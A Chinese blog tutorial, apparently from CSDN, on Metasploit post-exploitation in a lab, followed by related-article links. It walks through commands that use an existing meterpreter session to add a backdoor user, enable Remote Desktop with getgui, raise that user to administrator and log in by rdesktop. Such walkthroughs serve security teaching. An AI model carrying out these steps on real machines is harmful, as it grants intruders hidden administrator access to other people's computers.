攻防世界 适合做桌面_网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战...

最新推荐文章于 2023-06-07 14:00:00 发布
最新推荐文章于 2023-06-07 14:00:00 发布
阅读量218 收藏
点赞数
文章标签: 攻防世界 适合做桌面
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42124743/article/details/112412864
版权

课前声明:

1、本分享仅做学习交流,请自觉遵守法律法规!

2、搜索:Kali与编程,学习更多网络攻防干货!

一、背景介绍

在我们日常使用Kali Linux时,我们通常在进行模拟攻防演练的时候,我们如何拿下目标主机最高权限呢(例如利用病毒拿下Win7主机),怎样在受害者主机进行随意操作呢?如何进行文件下载以及文件上传呢?如何解决上述问题呢?接下来让我们一起学习!

二、资源装备 1.安装好Kali Linux的虚拟机一台; 2.已经被控制的Windows主机一个; 3.整装待发的小白一个。 三、战略安排 3.1 查看kali虚拟机sessions状况,如下图所示。 命令:sessions dea828cbe09636879a74d4d90c4ea6a2.png 3.2 在受害者主机执行病毒文件,如下图所示。 步骤:双击如下图所示的文件 ba194ade53c9dbeabe38f5994df36c13.png 3.3 再次在Kali Linux中执行sessions命令,如下图所示。 命令:sessions 79b36191e86aa68f5eb0d7fd692b7f7c.png 3.4 执行命令,给受害者主机创建用户,如下图所示。 命令:sessions -i 5 r un getgui -u 用户名 -p 密码 Eg: run getgui -u hacker -p 123456 08696dacd576c2b43b6281cf2808acbc.png 3.5 执行getgui脚本文件,开启受害者主机3389端口(远程桌面连接端口),如下图所示。 命令: run getgui -e bd9a70aa263dbcdfdf4714e2447467d5.png 3.5.1 执行结果如下图所示。 48bca0d4a35733626644ed810971da44.png 3.6 查看受害者主机的ip地址,如下图所示。 命令: ipconfig 6a534334e2179542f6d1fe2c47ea56c3.png 3.7 连接受害者主机的远程桌面,如下图所示。 命令: rdesktop 192.168.0.107:3389 f4a25d9aee728d8b1492baab008f6dc3.png 3.7.1 登录窗口如下图所示,根据创建的用户进行登录。 198b8d9cff31fe816fc03ea23cefa84a.png 3.8 遇到创建的用户不是管理员组用户的问题,如下图所示。 f34de6b0d06500cb479658c5f724e38c.png 3.9 解决升级管理员权限的问题。 3.9.1 启动dos窗口          命令:shell 2d124e9bc3b3e80799bbb3977205abd2.png 3.9.2 升级管理员用户,如下图所示。          命令:localgroup administrators 用户名 /add           Eg  :localgroup administrators  hacker /add d88366bf810d66f5c2a38ac7fcacf8a4.png 3.9.3 解决乱码问题,如下图所示。          命令:chcp 65001 6dbb042ec3dfbd2fb6050a2e49020fe8.png 3.10 继续登录,如下图所示。        3.10.1 登录界面 2ddb7a58aca8fe26b8e7c7da534e5df4.png        3 .10.2 选择是 5dedbcd1eeffeb524a6aa5587c1f59c5.png a1000866c81578bc364a85853046a04a.png 3.11 渗透成功,如下图所示。 248ea9458f33b53f41a724697fbebea3.png 05bf1ea621c406e57612629e68e73a79.png

辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!

歪头羊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali渗透测试技术实战
02-21
这本书主要介绍了kali的一些工具使用方法,以及linux的一些基本操作
Kali Linux渗透测试实战
03-10
Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头开始了解Kali Linux。按照官方网站 的定义,Kali Linux是一个高级渗透测试和安全审计Linux发行版。作为使用者,我简单的把它理解为,一个特殊的Linux发 行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用。也可称之为平台或者框架。
Web渗透测试怎么:安全专家模拟黑客行为讲述了渗透测试的原理
最新发布
m0_59162248的博客
06-07 154
渗透测试,是渗透测试工程师完全模拟黑客可能使用攻击技术和漏洞发现技术,对目标网络、主机、应用的安全作深入的探测,发现系统最脆弱的环节。如果说安全检测是“横向地毯式自动化扫描”,那么渗透测试就是“纵向深度人工化入侵”。可见渗透测试的目的是发现目标系统潜在的业务漏洞风险。安全问题都体现在输入输出的问题上,能够分析数据流就有迹可循了。先知道渗透测试的流程,用工具找到漏洞,了解并且复现它。
MSF模拟渗透测试攻击window实例
lza20001103的博客
04-06 4142
一次MSF模拟渗透测试攻击window实例
攻防世界-MISC:Training-Stegano-1
wlw1275178332的博客
03-07 1199
下载附件后打开是一个极小的bmp图片。考虑图层隐藏信息选择用用StegSolve打开,奈何图片实在太小无法发现有用信息。 回想起题目描述“最基础的图片隐写术” 选择用010editor打开,发现一段英文Look what the hex-edit revealed: passwd:steganoI 看见passwd尝试提交flag{steganoI},居然提交失败,再回过头看题目,并没有要求flag{}格式,单独提交steganoI,成功!!! 成功提交flag后,秉着一题多解的心态,查看了下其他师傅Wri
xctf攻防世界 MISC高手进阶区 Training-Stegano-1
l8947943的博客
01-12 320
1. 进入环境,下载附件 是个bmp位图,打开放大到700%,这一坨啥玩意 2. 问题分析 看到题目描述,这是我能想到的最基础的图片隐写术,那就StegSolve打开瞅瞅,打开后发现啥都没有,文件分析,如图: TMD,宽4高4,这么小的东西有个屁信息。果断扔到winhex里透析! passwd找到了,flag为:steganoI ...
攻防世界 Misc Training-Stegano-1
MrTreebook的博客
02-26 270
攻防世界 Misc Training-Stegano-11.winhex打开 1.winhex打开 看到password:steganoI flag就是 steganoI
kali linux安全渗透程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防渗透测试
Kali Linux高级渗透测试 _2016.05_罗伯特_KaliLinux高级渗透测试_渗透_完整版_
09-29
P226
kali_linux渗透测试视频程(10套程).txt
04-06
10套独家渗透测试视频程,熟练掌握Kali_Linux及metasploit渗透测试工具及渗透测试实战技巧,另赠送Kali_Linux web渗透测试实战材一套,metasploit渗透测试魔鬼训练营材一套。
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
攻防世界-MISC高手进阶区-学习记录
weixin_51160168的博客
06-21 618
攻防世界misc高阶破解(持续连载中)
【CTF MISC】pyc文件反编译到Python源码-2017世安杯CTF writeup详解
weixin_30654583的博客
03-27 2120
1、题目 Create-By-SimpleLab 适合作为桌面的图片 首先是一张图片,然后用StegSolve进行分析,发现二维码 扫码得到一串字符 03F30D0A79CB05586300000000000000000100000040000000730D0000006400008400005A000064010053280200000063000000000300000016000...
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
kali 桌面设置:风格设置
ResumeProject的博客
11-24 2481
然后只有一个lightdm选项,我选择了之后就进入了lightdm的界面。
攻防世界——web新手和引导模式(全解)
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界-get_post-(详细操作)题笔记 注:附带 工具安装
qq_43715020的博客
07-02 6001
攻防世界-get_post-(详细操作)题笔记 注:附带 工具安装
Kali Linux渗透之Metasploit攻防实战技巧
04-12
一、课程概要       本课程主要分享Kali Linux渗透之Metasploit攻防实战技巧! 二、适合人员       1、大学生       2、IT技术员       3、运维工程师       4、服务器工程师       5、渗透测试工程师
实战指南:利用Kali Linux进行渗透测试
《利用Kali进行黑客攻击实战渗透测试技术》是一本由James Broad和Andrew Bindner合著的专业书籍,它全面指导读者通过当前最先进的Live CD/USB系统Kali Linux进行渗透测试。本书旨在提供一个实用且深入的指南,帮助...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值